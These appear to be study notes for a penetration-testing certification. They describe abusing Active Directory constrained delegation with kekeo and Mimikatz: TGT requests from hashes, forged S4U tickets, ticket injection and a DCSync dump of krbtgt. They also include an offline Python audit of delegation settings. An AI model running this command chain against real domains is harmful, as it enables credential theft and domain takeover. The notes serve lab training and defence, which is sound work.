CRTP (Constrained-Delegation)
Constrained Delegation
Methodology/Steps
- List all the users that have Constrained Delegation configured
- Keep a note of the msDS-AllowedToDelegateTo value
- Request a TGT with kekeo using the hash of the user that has CD configured (which we must have collected beforehand)
- Keep a note of the returned TGT ticket
- Now request a TGS, passing the value from step 2 as /service and the TGT from step 4 as /tgt
- Keep a note of the returned TGS ticket
- Now we can inject the returned TGS ticket with Invoke-Mimikatz
- We can now list the file system of the delegation target, for example `ls \\dc-mysql\C$`, but we cannot run any WMI commands. If the delegation target is the DC, we can follow the same process and then perform a DCSync attack.
Enumerate users and computers with CD enabled
```powershell
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
```
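As an added example that is not part of the original note, the following offline audit takes the attributes the steps above tell us to record (msDS-AllowedToDelegateTo and userAccountControl) from a constructed export and ranks each delegating account by what the later steps could reach: it treats the target host rather than the service class as what matters (the TGS request further down swaps `time/` for `ldap/` on the same host) and flags delegation to a domain controller as the DCSync case. Account and host names in the sample are placeholders.

```python
# Added example, not from the original post: offline audit of constrained
# delegation over a constructed export of the two attributes the note says to
# record. Account/host names are placeholders, not from the original page.

# userAccountControl bit for "Use any authentication protocol" (protocol
# transition). Without it S4U2self returns a non-forwardable ticket, so the
# S4U chain in the note needs a genuine forwardable ticket from the victim.
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000

# Constructed sample export (the shape Get-DomainUser/-Computer returns).
SAMPLE_EXPORT = [
    {"sAMAccountName": "websvc", "userAccountControl": 0x1010200,
     "msDS-AllowedToDelegateTo": ["cifs/appsrv01.domain.local"]},
    {"sAMAccountName": "backupsvc", "userAccountControl": 0x10200,
     "msDS-AllowedToDelegateTo": ["cifs/appsrv01.domain.local"]},
    {"sAMAccountName": "adminsrv$", "userAccountControl": 0x1001000,
     "msDS-AllowedToDelegateTo": ["time/dc01.domain.local"]},
    {"sAMAccountName": "plainuser", "userAccountControl": 0x200,
     "msDS-AllowedToDelegateTo": []},
]
DOMAIN_CONTROLLERS = {"dc01.domain.local"}


def spn_host(spn: str) -> str:
    """Return the lowercase host part of service/host[:port][/name]."""
    _, _, rest = spn.partition("/")
    return rest.split(":")[0].split("/")[0].lower()


def audit(entries, domain_controllers):
    """Return (account, severity, reason) for every account with CD configured."""
    findings = []
    for entry in entries:
        targets = entry.get("msDS-AllowedToDelegateTo") or []
        if not targets:
            continue  # no constrained delegation on this account
        hosts = {spn_host(t) for t in targets}
        transition = bool(entry["userAccountControl"] & TRUSTED_TO_AUTH_FOR_DELEGATION)
        # The service class in the target SPN is not enforced, so time/dc01
        # grants the same reach as ldap/dc01 (hence DCSync): judge by host only.
        if hosts & domain_controllers:
            severity, reason = "critical" if transition else "high", "delegates to a domain controller"
        else:
            severity, reason = "high" if transition else "medium", "delegates to " + ", ".join(sorted(hosts))
        if transition:
            reason += "; protocol transition enabled (S4U2self for any user)"
        findings.append((entry["sAMAccountName"], severity, reason))
    return findings
```

Accounts with no msDS-AllowedToDelegateTo value are skipped, so the output is the same set of objects PowerView's `-TrustedToAuth` filter returns, with a severity attached.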
Requesting a TGT
```
tgt::ask /user:websvc /domain:domain.local /rc4:cc098f204c5887eaa8253e7c2749156f
tgt::ask /user:dcorp-adminsrv /domain:domain.local /rc4:1fadb1b13edbc5a61cbdc389e6f34c67
```
Request a TGS
```
tgs::s4u /tgt:TGT.kirbi /user:[email protected] /service:cifs/computer.domain.LOCAL
tgs::s4u /tgt:TGT.kirbi /user:[email protected] /service:time/computer.domain.LOCAL|ldap/computer.domain.LOCAL
```
Inject the ticket
```powershell
Invoke-Mimikatz -Command '"kerberos::ptt TGS.kirbi"'
```
Execute DCSync
```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```
This post is licensed under CC BY 4.0 by the author.